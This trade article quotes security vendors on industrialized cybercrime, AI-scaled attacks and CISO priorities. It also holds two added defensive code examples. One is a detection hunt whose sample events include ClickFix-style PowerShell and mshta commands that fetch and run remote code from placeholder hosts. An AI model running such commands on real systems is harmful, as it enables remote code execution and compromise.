Cybercriminals have built structured criminal groups with an organizational model similar to that of a legitimate business. “Cybercrime has become industrialized, a return on investment (ROI)-oriented economy, focused on speed and monetization,” according to Martin Zugec, Bitdefender’s director of technical solutions.
Zugec explains that this modus operandi of cybercriminal groups is characterized by a high degree of specialization, which includes initial access brokers or ransomware-as-a-service (RaaS) affiliates. “Today, sophistication is not measured by the complexity of the tools, but by the simplicity and speed of the execution chain,” says Zugec.
This change requires a shift from a threat detection-based approach to one focused on prevention. “Detection has become a commodity that attackers routinely evade, so organizations must go beyond reactive monitoring,” says Zugec. “The goal should be to break attackers’ playbooks and make internal environments inherently hostile to them through proactive hardening that eliminates the operational space they need to succeed.”
The business of cybercrime isn’t new
“Cybercrime has been operating as an industry for years, meaning it has become professionalized and attacks have been modularized,” says Guillermo Fernández, director of sales engineering for southern Europe at WatchGuard Technologies.
In practice, this means that it is no longer necessary for a single attacker to know how to do everything, but rather that the crime is divided into specialties (some steal and resell credentials, others develop and maintain ransomware, others provide infrastructure and negotiation, etc.) and all of this is packaged into models as a service, as we see in the case of ransomware-as-a-service. “This lowers the barrier to entry and reduces the cost of attacking, which explains why we are seeing more and more campaigns and higher volumes,” says Fernández.
In addition, AI helps accelerate the scale and sophistication of some phases or tasks, such as reconnaissance, personalization of deceptions, or automation of parts of the process.
How big is it? “The global economic impact of cybercrime is close to $10 trillion. If it were a country’s economy, it would be one of the three world powers, behind only the United States and China. For organizations, this means that it is not enough to react to incidents. Defense must take the same business approach: anticipation, risk management, operational continuity, and resilience by design,” says Juan Francisco Moreda, director of /fsafe, Fibratel’s cybersecurity unit.
As a result, cybercrime has become a fully industrialized criminal economy, according to Moreda. “Today we are talking about highly specialized organizations, with as-a-service models (ransomware, phishing, malware), their own supply chains, and a clear focus on profitability and scalability.”
That is why Martín Trullás, director of Advanced Solutions at Ingram Micro Spain, believes that cybercrime operates with well-organized structures, different professional profiles in its ranks, short- and long-term objectives, and financing that allows it to improve its model with new technology and new strategies to achieve the success of its operations.
“Cybercriminals are no longer isolated individuals with computer skills and a desire for quick and easy money, but actors who, in some cases, appear to have state support to use them as part of a struggle that transcends the economic and digital spheres and often enters the realm of geopolitics.”
However, in his opinion, there are still simple gangs of cybercriminals whose goal is money or data, which they then turn into profit by reselling it to third parties. “What’s happening is that they now have better access to more powerful technologies with which they can streamline their operations, attacking with greater speed and in a massive and scalable way. This changes the approach to cyber defense: we can no longer be reactive, equipping companies and users with different levels of ‘shields’ and sitting back to wait for the attack to repel it, but rather we must take action,” Trullás adds.
That is why Trullás believes that the best cyber defense strategy must combine passive security with active monitoring of the entire digital ecosystem of the company or user, to reduce the time taken to detect and respond to an incident to limit damage.
Evolution of the security strategy
Alessandro Armenia, global head of cybersecurity at ReeVo, believes that three key aspects are emerging in the current landscape: “First, attacks are no longer isolated events, but coordinated, in some cases automated, operations that often originate within the organizations themselves, for example, due to human error or exposed credentials. Second, the time factor plays a decisive role: even today, many companies realize they are under attack when it is already too late. Finally, the attack surface is growing faster than companies’ ability to manage it.”
As a result, the defense strategy must also evolve. “It can no longer be based solely on compliance or one-off interventions, but must be continuous, structured, and resilience-oriented,” Armenia explains.
And that’s despite the fact that companies have the necessary tools to manage their attack surface. “Where they often fail is in the governance model: cybersecurity continues to be approached as a series of isolated compliance exercises over time, and it is precisely in the gaps between one exercise and another that the attacker manages to infiltrate and carry out the attack.”
The reality is that an IT outage becomes a serious problem when the company has no plan. “A prepared organization, with defined and tested procedures, is able to recover in a matter of minutes; those that are not prepared run the risk of losing hours, days, and, in some cases, their reputation,” Armenia concludes.
Cybercriminals, meanwhile, now have organizational models similar to those of companies. “You can see that there are different types of profiles in these groups, depending on the size of the organization, from the more technical ones, who work in a coordinated team, to the more commercial ones, who are in charge of dealing with victims when negotiation is necessary,” warns David Sancho, senior threat researcher at Trend Micro.
Furthermore, Sancho explains that they often also have people who are responsible for selling the product created to partners or customers, “which in the business world would correspond to the channel or marketing. This is already a reality.”
Established groups
Abraham Vázquez, pre-sales engineer at Infinigate Iberia, gives examples such as the DragonForce or Anubis groups, which “operate as genuine criminal service providers, offering infrastructure, management panels, technical support, and different extortion models. It is a highly fragmented ecosystem, but at the same time very resilient, capable of adapting and regenerating quickly.”
This leads him to conclude that the main implication for defense is that it is no longer enough to react to the final attack. “It is necessary to disrupt the entire criminal chain, reinforcing identity as a central pillar of security, prioritizing proper credential hygiene, greater telemetry capabilities, and rapid containment mechanisms that limit the impact from the early stages of the attack,” Vázquez adds.
And the outlook is not promising. “According to the World Economic Forum, the cybercrime economy will continue to grow, reaching $23 trillion by 2027. Industrialized ransomware, automated fraud networks, and converging crime models will drive this growth,” says Gorka Sainz, director of systems engineering at Fortinet Iberia.
The role of AI and automation
“AI is the new fuel for the criminal economy. It allows them to scale attacks as if they were marketing campaigns,” argues Salvador Sánchez Taboada of CyberProof UST.
A glance at the business landscape is enough to see that artificial intelligence has become a real multiplier of scale for the criminal economy, enabling the generation of highly granular and personalized phishing campaigns on demand, as Abraham Vázquez argues. “This includes everything from deepfakes of executives to increasingly evasive malware, supported by tools such as WormGPT or FraudGPT. Thanks to these capabilities, attacks are more credible, difficult to detect, and easy to replicate.”
As an example, CrowdStrike’s 2025 Threat Hunting Report reveals how cybercriminals are targeting the tools used to build AI agents. “Their goal is to gain access, steal credentials, and deploy malware, highlighting how autonomous systems and non-human identities are a key part of today’s enterprise attack surface and a growing enabler of large-scale automated attacks,” says Álvaro del Hoy, technology strategist at CrowdStrike.
Add to this that criminal groups are integrating generative AI directly into ransomware, “using it to automatically create variants and optimize processes such as executing attacks, negotiating with victims, and extortion strategies,” says Abraham Vázquez.
Automation is key to streamlining access, lifecycle, and permission processes, but Albert Barnwell, director of sales for Iberia at CyberArk, also notes that attackers seek to exploit identities and privileges at scale.
“This means that offensive automation allows cybercriminals to move faster and exploit compromised identities without friction. Thus, organizations must respond with defensive automation, especially in the management of identity lifecycle, permissions, and rights,” Barnwell adds.
We are already reaching a point where the entire attack cycle can be automated through orchestration: agents that investigate a company and its employees (including social media footprints, interests, and potential weaknesses), others that generate highly targeted and convincing phishing, and chains that lead to malware infection, according to Guillermo Fernández. “From there, the malware itself can learn about the environment and find out what tools and defenses are in place within the company in order to adjust its technique and maximize its impact,” he says.
And this doesn’t stop at initial access, as even extortion can be automated. It is even possible for the ransom negotiation to be carried out by a bot that adapts its discourse and conditions based on the responses to squeeze out the payment.
Martin Zugec says AI is not a magic bullet for attackers. While it has significantly helped to scale social engineering attacks, removing language barriers and improving the quality of decoys, these tools are not particularly useful for the heavier work of an intrusion.
“We see very little evidence that AI is successfully replacing human expertise in vulnerability research or exploit development. The RaaS ecosystem relies on trust and human ingenuity. The main drivers of successful attacks continue to be hackers and affiliates who operate manually and navigate complex networks. The question is not what AI is capable of doing in theory, but whether it makes sense from an economic standpoint. For a professional threat actor, the cost of managing, adjusting, and securing an AI framework often outweighs the efficiency gains over traditional and proven hacking techniques,” Zugec elaborates.
Main threats and attack vectors in 2026
The current geopolitical context does not invite optimism either. Carlos Castañeda-Marroquin, head of pre-sales and business development at Serval Networks, believes that “in 2026, we will see an increase in hybrid threats driven by geopolitical tensions, where cyberspace is used as an extension of economic and strategic conflicts between states and related groups. This will translate into espionage, digital sabotage, and disinformation campaigns targeting both critical infrastructure and key industrial sectors.”
The theft of credentials and tokens, the use of infostealers, or the abuse of valid access, combined with a greater emphasis on malware-free techniques and hands-on-keyboard activity, have been gaining ground in recent months, according to David López García, director of operations at Factum. All of this leads, in many cases, to system intrusions that evolve into ransomware and extortion, with increasingly shorter, more automated attack cycles that are clearly aimed at operational and economic impact.
López García also warns that in 2026, the extended perimeter and relationships with third parties will gain prominence. “Faced with a larger surface area of exposure, cybercriminals find more opportunities to exploit configurations, identities, and external dependencies, with a greater likelihood of finding a breach in the supply chain.”
Consequently, the challenge for organizations is no longer just to protect their systems but to effectively govern an interconnected digital ecosystem, where trust becomes one of the most critical assets and having solid solutions or allies is an operational necessity.
In terms of attack vectors, Guillermo Fernández believes that vulnerabilities and weak configurations in remote access and VPNs will continue to be prominent, in addition to the compromise of SaaS tools (accounts, permissions, integrations). “And on the human front, social engineering will become even more effective with advanced phishing and image and voice deepfakes, increasing the risk of fraud. Likewise, we will see more impersonation and initial access. WatchGuard also anticipates that 2026 may be the year of the first agent-based AI-orchestrated end-to-end breach, bringing offensive automation to ‘machine speed,’” Fernández says.
Are companies investing enough in cyber defenses?
Rafe Pilling, director of threat intelligence at Sophos X-Ops, sees a ‘cybersecurity poverty line’ that affects not only budgets but also the availability of strategic leadership and the capabilities needed to define roadmaps, understand key metrics, and progress toward maturity goals. “The strong performance of the cybersecurity market does not eliminate the fundamental gap between real risk and management perception. Sophos predicts that many of the most serious disruptions in 2026 will not be the result of sophisticated techniques, but of basic security hygiene failures that are entirely preventable,” he explains.
Pilling argues that the reality is that having a CISO in a company is now a luxury, highlighting the magnitude of the specialized talent deficit. Companies must understand cyber resilience as a strategic priority at the management level and not just as a technological challenge. This gap between available capabilities and real threats explains why most organizations lack the visibility, controls, and expertise necessary to defend themselves effectively against a highly industrialized criminal ecosystem.
What is clear is that as cyber threats increase, organizations are facing the reality that security attacks are not just a possibility, but a certainty. “At the same time, it is estimated that there is a global shortage of more than 4.7 million qualified professionals, which means that critical security positions are not being filled when they are most needed,” says Gorka Sainz.
“There remains a clear gap in effectiveness,” says Abraham Vázquez. In his opinion, “many organizations still lack real visibility into their risk exposure, boards of directors maintain a limited level of confidence in defensive capabilities, and third parties continue to play a significant role, being involved in approximately 30% of security breaches.”
On the other hand, there is still a gap between the complexity of the environment (hybrid, SaaS, multi-cloud) and the maturity of identity controls. Likewise, many organizations still do not consistently apply intelligent privilege controls, while the need to automate the identity and permission lifecycle indicates that current investment is not always sufficient or well targeted.
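The two passages above on automating the identity and permission lifecycle, and the earlier point that non-human identities (service accounts, tokens) are now part of the attack surface, describe a practice rather than a product. The following is an added example, not code from the article or from any vendor named in it: a small review pass over a constructed identity inventory that applies the lifecycle rules a defender would automate (dormant accounts, orphaned service accounts, stale credentials) and orders the resulting actions by risk. The inventory, the policy thresholds and the field names are all assumptions chosen for the example.

```python
"""Added example: rule-based review of human and non-human identities.
The inventory below is constructed for illustration; thresholds are assumptions."""
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple


@dataclass
class Identity:
    name: str
    kind: str                  # "human" or "service" (non-human identity)
    privileged: bool           # holds admin-level rights anywhere
    last_used: Optional[date]  # None = never seen authenticating
    owner: Optional[str]       # accountable person for a service account
    owner_active: bool         # False once the owner has left the organisation
    credential_age_days: int   # age of the password / API key / certificate


def review_identity(ident: Identity, today: date,
                    dormant_days: int = 45, max_cred_age: int = 90) -> Tuple[int, List[str]]:
    """Return (priority, actions) for one identity. Priority 0 means nothing to do;
    3 = privileged, 2 = non-human identity, 1 = ordinary human account."""
    actions: List[str] = []

    idle = None if ident.last_used is None else (today - ident.last_used).days
    if idle is None:
        actions.append("disable: never used")
    elif idle > dormant_days:
        actions.append(f"disable: idle {idle}d")

    # A service account whose owner is missing or gone has nobody to approve
    # its rights or notice its misuse; it must be re-owned before anything else.
    if ident.kind == "service" and (ident.owner is None or not ident.owner_active):
        actions.append("reassign owner: orphaned service account")

    if ident.credential_age_days > max_cred_age:
        actions.append(f"rotate credential: {ident.credential_age_days}d old")

    if not actions:
        return 0, actions
    priority = 3 if ident.privileged else (2 if ident.kind == "service" else 1)
    return priority, actions


def review(identities: List[Identity], today: date, **policy) -> List[Tuple[int, str, List[str]]]:
    """Review every identity and return (priority, name, actions), highest risk first."""
    out = []
    for ident in identities:
        prio, actions = review_identity(ident, today, **policy)
        if prio:
            out.append((prio, ident.name, actions))
    out.sort(key=lambda row: (-row[0], row[1]))
    return out


# Fixed "today" so the example is deterministic (assumption).
TODAY = date(2026, 1, 15)

# Constructed inventory: one entry per lifecycle failure the rules should catch.
SAMPLE_IDENTITIES = [
    Identity("svc-backup", "service", True, date(2025, 10, 1), "alice", False, 400),
    Identity("ci-deploy-token", "service", False, date(2026, 1, 14), "bob", True, 120),
    Identity("jdoe", "human", False, date(2026, 1, 13), None, True, 30),
    Identity("old-admin", "human", True, None, None, True, 800),
    Identity("mmartin", "human", False, date(2025, 11, 1), None, True, 60),
]

if __name__ == "__main__":
    for prio, name, actions in review(SAMPLE_IDENTITIES, TODAY):
        print(f"P{prio} {name}: " + "; ".join(actions))
```

Running the block lists the privileged accounts first (the never-used admin and the orphaned, dormant backup account), then the CI token whose credential has outlived the rotation policy, and last the ordinary dormant user; the healthy account produces no action. In practice the inventory would come from the directory and the secrets store, and the output would feed a ticketing or automated-disable workflow rather than stdout.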
And not only does this gap exist, but there is also a cultural gap, as Salvador Sánchez Taboada points out. “Many management teams see cybersecurity as an expense, not as a lifesaver,” he acknowledges. “In Spain and Latin America, we are working to change that view, relying on integration through AI between existing risk plans and new threats: investing in resilience is like investing in good foundations before building a house. Every change of cycle reminds us that the invisible—like foundations—supports everything we value.”
Increased spending “is often diverted toward AI hype and supposedly miraculous solutions driven by marketing, rather than addressing real risks,” argues Martin Zugec. That is why he believes attackers have evolved toward simpler, harder-to-detect techniques, such as living off the land (LOTL) or ClickFix, which weaponize legitimate system tools and user interactions to bypass security layers.
“This disconnect between where defenders invest and how attackers evolve is a dangerous trend, clearly visible when comparing the findings of real forensic investigations with the narratives popularized in professional networks. This disconnect is reckless,” he warns.
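The techniques Zugec names leave little for signature-based tooling to match: LOTL runs attacker logic through binaries that are already on the host, and ClickFix persuades the user to paste a command into the Run dialog or a terminal, so the execution chain starts from explorer.exe rather than from a document or an exploit. What the forensic record does show is the process-creation event. The block below is an added example, not code from the article or from Bitdefender: a scoring hunt over constructed, Sysmon-style process-creation records that combines three signals (a living-off-the-land binary, a parent typical of a user-pasted command, and command-line indicators such as hidden windows, encoded commands, download cradles and the “verification” comment trailer reported in ClickFix lures). The event fields, the weights and the threshold are assumptions.

```python
"""Added example: hunt for LOTL / ClickFix execution chains in process-creation events.
Events are constructed, Sysmon-like records, not real telemetry; weights are assumptions."""
import re
from dataclasses import dataclass
from typing import List

# Legitimate Windows binaries routinely abused to run attacker code without
# dropping a custom tool on disk (living off the land).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# Parents typical of a ClickFix lure: the user pressed Win+R (explorer.exe) or
# opened a terminal and pasted the command; no macro or exploit is involved.
USER_LAUNCH_PARENTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe", "conhost.exe"}

# Command-line indicators, each worth the same weight; a benign admin script
# may hit one of them, a pasted lure usually hits several.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window",   re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("download_cradle", re.compile(r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|invoke-expression|iex|curl|wget)\b")),
    ("remote_hta",      re.compile(r"(?i)mshta(?:\.exe)?\s+https?://")),
    ("bypass_policy",   re.compile(r"(?i)-e(?:p|x|xecutionpolicy)\s+bypass")),
    ("clickfix_marker", re.compile(r"(?i)#.{0,12}?(?:i am not a robot|captcha|verification)")),
]


@dataclass
class ProcessEvent:
    image: str         # executable name of the new process
    parent_image: str  # executable name of the parent
    command_line: str
    user: str


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    reasons: List[str]


def score_event(ev: ProcessEvent) -> Finding:
    """Score one event: 1 for a LOLBIN, +2 if launched from a user-facing parent,
    +2 per command-line indicator matched."""
    score, reasons = 0, []
    image, parent = ev.image.lower(), ev.parent_image.lower()
    if image in LOLBINS:
        score += 1
        reasons.append("lolbin")
        if parent in USER_LAUNCH_PARENTS:
            score += 2
            reasons.append(f"user-launched from {parent}")
    for name, rx in INDICATORS:
        if rx.search(ev.command_line):
            score += 2
            reasons.append(name)
    return Finding(ev, score, reasons)


def hunt(events: List[ProcessEvent], threshold: int = 4) -> List[Finding]:
    """Return findings at or above the threshold, in event order."""
    return [f for f in map(score_event, events) if f.score >= threshold]


# Constructed events: a pasted ClickFix lure, a remote HTA, a scheduled admin
# script that legitimately bypasses execution policy, and two benign processes.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe", "explorer.exe",
                 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/v.txt | iex" '
                 "# 'I am not a robot - reCAPTCHA Verification ID: 7811'", "CORP\\jdoe"),
    ProcessEvent("mshta.exe", "explorer.exe",
                 "mshta https://198.51.100.7/verify.hta", "CORP\\mmartin"),
    ProcessEvent("powershell.exe", "services.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1", "NT AUTHORITY\\SYSTEM"),
    ProcessEvent("certutil.exe", "svchost.exe",
                 "certutil.exe -dump C:\\certs\\leaf.cer", "NT AUTHORITY\\SYSTEM"),
    ProcessEvent("notepad.exe", "explorer.exe", "notepad.exe", "CORP\\jdoe"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"score={f.score:2d} {f.event.user:<20} {f.event.image:<15} {', '.join(f.reasons)}")
```

The scheduled backup script scores 3 (a LOLBIN plus an execution-policy bypass) and stays under the threshold, while the pasted lure and the remote HTA cross it because the user-facing parent adds weight that a service-launched process never gets. That parent-child relationship is the part worth keeping even if the indicator list is tuned: it is what distinguishes a ClickFix chain from the same binaries run by management tooling.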
CISO priorities
In this context, CISOs are forced to continually rethink their defense strategies. “Beyond having solid internal teams and adequate prevention tools, it is increasingly necessary to complement these capabilities with trusted technology partners and insurers capable of managing cyber risk in a more holistic way,” says Vincent Nguyen, director of cybersecurity at Stoïk.
As attackers professionalize and scale their operations, Nguyen believes that effective defense requires a proactive and integrated approach that combines advanced cybersecurity solutions, risk transfer through cyber insurance, and operational support when an incident occurs. “Strategic partners with a cross-functional view of risk can accompany organizations before, during, and after an attack, strengthening resilience without replacing internal security leadership,” he adds.
In any case, Martín Trullás acknowledges that there is no single winning strategy for the CISO, but rather a set of different strategies focused on different areas. “On the one hand, identity security must be strengthened, as it can become a gateway for more serious attacks. And this identity security should no longer be understood only as ‘human identity’ but must also focus on the identity of connected devices, which can also become vectors for attack,” he explains.
“At the same time, it is necessary to implement organizational and mindset changes within the company: proper governance, cybersecurity training for all employees, promotion of best practices to reduce risks, and a culture of proactivity to reduce detection and response time in the event of an attack. The entire company must be involved in these processes, because leaving cybersecurity as the sole responsibility of the CISO or the department on duty is a mistake that can be very costly.”
Of course, this requires CISOs to have the right resources. “And they don’t have it easy, with often unrealistic expectations that cause them to experience signs of burnout,” says Fernando Anaya, general manager of Proofpoint for Spain and Portugal.
Anaya cites this data: “In Spain, 51% of security managers say they still lack the necessary means to meet their objectives. Similarly, it is crucial to strengthen incident response capabilities, especially considering that a third of Spanish organizations admit to being unprepared. A much more proactive approach is also needed to foster a culture of cybersecurity that goes beyond simply trusting users and includes concrete and effective actions to reduce data loss. The pressure on CISOs is increasing as these resource constraints are combined with such a rapidly changing threat environment, making it imperative that they work to align themselves strategically with their organizations’ boards of directors, seeking a shared vision that ensures the necessary support and appropriate decision-making.”
At the same time, Abraham Vázquez believes that it will be essential to advance zero-trust models and perimeter hardening, eliminating legacy VPNs and accelerating patching processes in edge environments, as well as ensuring proven resilience through immutable backups and isolated recovery environments. “The automation of detection and response, supported by SOAR and AI platforms, will enable the cycle between detection and containment to be closed efficiently, effectively reducing response times. Added to this is the need for more mature third-party and supply chain management, based on continuous assessment of cybersecurity posture and minimal but relevant telemetry.”
“It will be key to conduct internal crisis management exercises that consider realistic scenarios, such as ransomware attacks without payment, fraud using deepfakes of management, or outages of critical suppliers.”